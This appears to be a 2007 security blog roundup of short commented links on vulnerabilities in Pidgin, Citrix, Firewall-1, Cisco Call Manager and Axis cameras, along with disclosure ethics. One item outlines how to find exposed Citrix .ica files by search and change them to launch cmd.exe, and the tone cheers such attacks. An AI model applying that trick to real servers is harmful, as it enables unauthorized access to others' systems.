[http://securityvulns.com/Sdocument126.html Pidgin Remote DoS] - [PaulDotCom] - A "nudge" message sent to a user of Pidgin on the MSN network will cause the client to access invalid memory and crash. Vulnerabilities in chat clients that rely on merely receiving a message are very scary, and seem to be popular these days. Its interesting, since we have firewalled ourselves into oblivion, a great way to get evil packets to your victim is via an IM. Even web browser and web-based exploits are cool, but you still have to get the user to click on something. If I am in a chat channel or on IM, you just need to send me a message and I am pwned.
[http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/ Citrix Low-Tech Hacking] - [PaulDotCom] - Hacking without exploits is great, and thats my new catch phrase. All these people patching everything, running IPS, A/V, and what not makes it a little harder to run traditional exploits (I did say a "little"). This is a great example of how to use your Google hacking skills (okay, its a simple query "ext:ica") and find Citrix servers. Looking into this file reveals that we can run a program or command, and if the server is anonymous, change the command to "cmd.exe". Sweet! Instant command shell!
[http://www.heise-security.co.uk/news/96860/from/atom10 Firewall-1 is full of holes] - [PaulDotCom] - I did not have time to read the 200+ page report, however, reports say it looks legit. Many of the attacks appear to be buffer overflows in local commands, which sounds like it would require access to the firewall already. However, its how they found these exploits that is scary, ''"According to Pentest, they have not even used fuzzing tools for their tests, but have simply used manipulated arguments to cause a buffer overflow in the programs; this does not comply with the vendor’s description of the relevant target of evaluation"''. So like, passing a large parameter to a command triggers a buffer overflow, sweet! If its that easy, where are other holes lurking?
[http://isc.sans.org/diary.html?storyid=3456 Protecting Mobile users - ideas?] - [PaulDotCom] - Chris is right, we need to protect our mobile users. However, traditional methods such as logging on with user privs, A/V, anti-spyware, and firewalls just aren't enough. Malware is too smart, and users are too dumb. We almost need to wipe mobile users machines on a regular basis, and keep the data separate and protected. It would be a neat experiment, store all your data on an encrypted thumbdrive, then your machine gets wiped everytime you come back to the office... I know, I am the "Mad Security Geek".
[http://www.milw0rm.com/exploits/4482 A nice healthy SQL Injection Exploit] - [PaulDotCom] - A notice to all companies producing web applications, when a vulnerability is found in your product, take down your demo site.
[http://blogs.technet.com/bluehat/archive/2007/09/28/the-new-security-disclosure-landscape.aspx RFP Emerges, Speaks about disclosure] - [PaulDotCom] - According to RFP, testing someone else's web site is a no-no. Quote: ''"NO MATTER YOUR INTENTIONS, LOOKING FOR SECURITY VULNERABILITIES IN THIRD-PARTY WEB SITES (without permission) IS ILLEGAL PER THE LAWS OF YOUR COUNTRY. Period. "'' Whoa. This could go either way. I've seen some people be happy that you found a vuln in their web site, and I can definitely see it going the other way. Thoughts? Oh, and where has RFP been since 2003 anyway? BTW, check out some [http://www.microsoft.com/technet/security/bluehat/2007fall.mspx podcasts from Microsoft.]
[http://www.engadget.com/2007/09/28/iphone-update-facts-and-fiction/ iPhone "bricking" and hacking] - [PaulDotCom] - A bit off-topic, but some ppl are wondering why their iPhones are bricked once they apply a firmware update to a hacked phone. Just an example, OpenWrt can potentially brick due to an upgrade, but I would still like to know more about how the iPhone works (my understanding is that there is firmware on the modem and a separate OS for the rest?). [http://www.mckeay.net/secure/2007/09/ibrick.html Martin seems convinced] that Apple did this on purpose, however, it could be just an artifact of hacking and firmware upgrades. Why would they only brick phones with the anySIM program and not all hacks?
[http://seclists.org/vulnwatch/2007/q3/0056.html Cisco Call Manager SQL Injection and XSS] - [PaulDotCom] - These vulnerabilities exist in the login page, hence you do not need to be authenticated. The SQL one is interesting, ''"An attacker could exploit the SQL injection vulnerability to read
a single value from the database. Several successful attacks could disclose information about the database, information such as user names and passwords, and information from call records such as the time calls are placed and the numbers dialed. This vulnerability cannot be used to alter or delete call record information from the database."'' Niiiiiice! Extracting call records, that could be interesting...
[http://www.procheckup.com/Vulnerability_Axis_2100_research.pdf Pwning the Axis Camera] - [PaulDotCom] - A slew of vulnerabilities exist here, many of which are persistant XSS, which allows the attacker to redirect the video of the camera. So, instead of seeing [http://www.youtube.com/watch?v=IuwMOBM5xfU Female Ninjas rob the store] you see an empty store with the clerk picking their nose. Sweeeet.